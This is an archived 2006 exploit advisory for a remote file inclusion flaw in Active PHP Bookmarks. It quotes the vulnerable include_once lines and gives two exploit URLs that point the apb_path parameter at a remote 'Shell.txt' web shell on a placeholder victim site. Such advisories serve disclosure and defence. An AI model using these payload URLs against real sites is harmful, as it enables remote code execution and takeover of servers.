apb-rfi.txt

2006-11-27T00:00:00
ID PACKETSTORM:52522
Type packetstorm
Reporter ThE-LoRd-Of-CrAcKiNg
Modified 2006-11-27T00:00:00

Description

                                        
                                            `Title : Active PHP Bookmarks (apb.php) Remote file include  
########################################################################  
#######  
  
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}  
  
------------------------------------------------------------------------  
Sorce Code:  
http://lbstone.com/apb/downloads/apb-1.1.02.zip  
  
Affected software description :  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : Active PHP Bookmarks  
Catégorie :Remote File Include  
------------------------------------------------------------------------  
-----  
Vulnerable Code:  
include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php');   
(apb_common.php)  
include_once($APB_SETTINGS['apb_path'].'apb_group_class.php');   
(apb_common.php)  
include_once($APB_SETTINGS['apb_path'].'apb_view_class.php');   
(apb_common.php)  
  
include_once($APB_SETTINGS['apb_path']."apb_common.php"); (apb.php)  
----------------------------------------------------------------------  
Exploit:  
http://www.VicTim.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_path']=Shell.txt?  
http://www.VicTim.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=Shell.txt?  
  
  
------------------------------------------------------------------------  
----  
  
greetz:   
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my   
friends  
  
Special Greeting:AsbMay's Group  
  
channel:www.asb-may.net  
  
contact:spoonman500[at]hotmail[dot]com  
  
_________________________________________________________________  
Testez Windows Llive Mail Beta !   
http://www.msn.fr/newhotmail/Default.asp?Ath=f  
  
`